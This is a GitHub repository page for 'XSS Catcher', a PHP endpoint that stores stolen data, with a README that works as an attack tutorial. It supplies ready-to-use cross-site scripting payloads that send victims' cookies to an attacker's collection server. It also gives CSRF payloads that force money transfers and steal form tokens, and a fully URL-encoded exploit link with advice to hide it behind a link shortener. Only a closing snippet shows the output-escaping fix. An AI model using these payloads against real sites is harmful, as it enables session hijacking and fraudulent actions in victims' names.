Skip to content

5l1v3r1/xss-catcher

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit

db

db

 
 

img

img

 
 

src

src

 
 

.gitattributes

.gitattributes

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

XSS Catcher

Simple API for storing all incoming XSS requests.

Every incoming XSS request must contain site and data (i.e. stolen data) request parameters. Additionaly, you can add the info request parameter.

This topic is very broad and only few client side injections were covered. Keep in mind that XSS is not limited only to JavaScript.

Play with the given examples and make your own (possibly shorter).

Tested on XAMPP for Windows v7.3.7 (64 bit) with Chrome v77.0.3865.120 (64-bit) and Firefox v70.0 (64-bit).

Made for educational purposes. I hope it will help!

How to Run

Import '\db\xss_catcher.sql' to your database server.

Copy all the content from '\src\' to your server's web root directory (e.g. to '\xampp\htdocs\' on XAMPP).

Change the database settings inside '\src\php\config.ini' as necessary.

Navigate to your database panel with your preferred web browser.

Cross-Site Scripting

Usually used to steal data or to modify a web page.

Cookies must be missing the HttpOnly flag in order for you to steal them.

Steal HTTP cookies by injecting the following JavaScript code:

<script>var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://myserver.com/store.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('site=' + encodeURIComponent(location.hostname + location.pathname) + '&data=' + encodeURIComponent(document.cookie));</script>

<script>var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://myserver.com/store.php', true); xhr.send('{\"site\": \"' + encodeURIComponent(location.hostname + location.pathname) + '\", \"data\": \"' + encodeURIComponent(document.cookie) + "\"}");</script>

First example above will send an HTTP POST request to your server with user-defined parameters as form-data. Opt for this example whenever possible.

To send user-defined parameters as form-data, you must add the Content-Type: application/x-www-form-urlencoded HTTP request header.

Second example above will send an HTTP POST request to your server with raw data encoded in JSON.

Steal HTTP cookies by injecting the following HTML code:

<img src="https://github.com/favicon.ico" alt="xss" onload="var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://myserver.com/store.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('site=' + encodeURIComponent(location.hostname + location.pathname) + '&data=' + encodeURIComponent(document.cookie));" hidden="hidden">

<img src="https://github.com/favicon.ico" alt="xss" onload="this.src = 'https://myserver.com/store.php?site=' + encodeURIComponent(location.hostname) + location.pathname + '&data=' + encodeURIComponent(document.cookie);" hidden="hidden">

First example above will send an HTTP POST request to your server with user-defined parameters as form-data.

Second example above will send an HTTP GET request to your server with user-defined parameters in a query string (i.e. in a URL).

Cross-Site Request Forgery

Does not necessarily need to steal or modify anything. The goal is to execute a forged query string, commonly in the name of signed in user.

Try to figure out what kind of data does the backend server accept before you try to forge/send anything. Is it a query string, form-data, raw data encoded in JSON, etc.?

Plant a forged request by injecting the following JavaScript code:

<script>var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://target.com/transfer.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('recipient=eve&amount=9000');</script>

Example above will send an HTTP POST request to the target server in a victim's name with user-defined parameters as form-data.

Plant a forged request whilst stealing a web form token by injecting the following JavaScript code:

<script>window.onload = function() { var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://target.com/transfer.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('recipient=eve&amount=9000&token=' + encodeURIComponent(document.getElementsByName('token')[0].value)); }</script>

<script>window.onload = function() { var xhr = new XMLHttpRequest(); xhr.open('GET', 'https://target.com/transfer.php?recipient=eve&amount=9000&token=' + encodeURIComponent(document.getElementsByName('token')[0].value), true); xhr.send(); }</script>

First example above will send an HTTP POST request to the target server in a victim's name with user-defined parameters as form-data.

Second example above will send an HTTP GET request to the target server in a victim's name with user-defined parameters in a query string (i.e. in a URL).

To steal a web form token or any other web form data, you must wait for the web form to fully render/load. You can do that by calling the window.onload event.

Plant a forged request by injecting the following HTML code:

<img src="https://target.com/transfer.php?recipient=eve&amount=9000" alt="xss" hidden="hidden">

<img src="https://github.com/favicon.ico" alt="xss" style="background-image: url('https://target.com/transfer.php?recipient=eve&amount=9000');" hidden="hidden">

Both examples above will send an HTTP GET request to the target server in a victim's name with user-defined parameters in a query string (i.e. in a URL).

Plant a forged request by injecting the following CSS code:

<style>div { background-image: url('https://target.com/transfer.php?recipient=eve&amount=9000'); }</style>

Example above will send an HTTP GET request to the target server in a victim's name with user-defined parameters in a query string (i.e. in a URL).

Proof of Concept - No Input Sanitization

This proof of concept shows how to steal cookies through unsanitized request parameter.

Vulnerable code:

<script>var language = '<?php if (isset($_GET["language"])) { echo $_GET["language"]; } ?>';</script>

Expected use:

<script>var language = 'en';</script>

User-supplied data:

en'; var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://myserver.com/store.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('site=' + encodeURIComponent(location.hostname + location.pathname) + '&data=' + encodeURIComponent(document.cookie)); var test = '

Always make sure to properly close the surrounding code.

Encode your code to the URL encoded format here.

Final XSS request:

https://localhost/welcome.php?language=en%27%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27https%3A%2F%2Fmyserver.com%2Fstore.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application%2Fx-www-form-urlencoded%27%29%3B%20xhr.send%28%27site%3D%27%20%2B%20encodeURIComponent%28location.hostname%20%2B%20location.pathname%29%20%2B%20%27%26data%3D%27%20%2B%20encodeURIComponent%28document.cookie%29%29%3B%20var%20test%20%3D%20%27

You can also shorten your query string (i.e. your URL) with Bitly.

Solution:

<script>var language = '<?php if (isset($_GET["language"])) { echo htmlentities($_GET["language"], ENT_QUOTES, "UTF-8"); } ?>';</script>

Images

Database

About

Simple API for storing all incoming XSS requests.

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • PHP 100.0%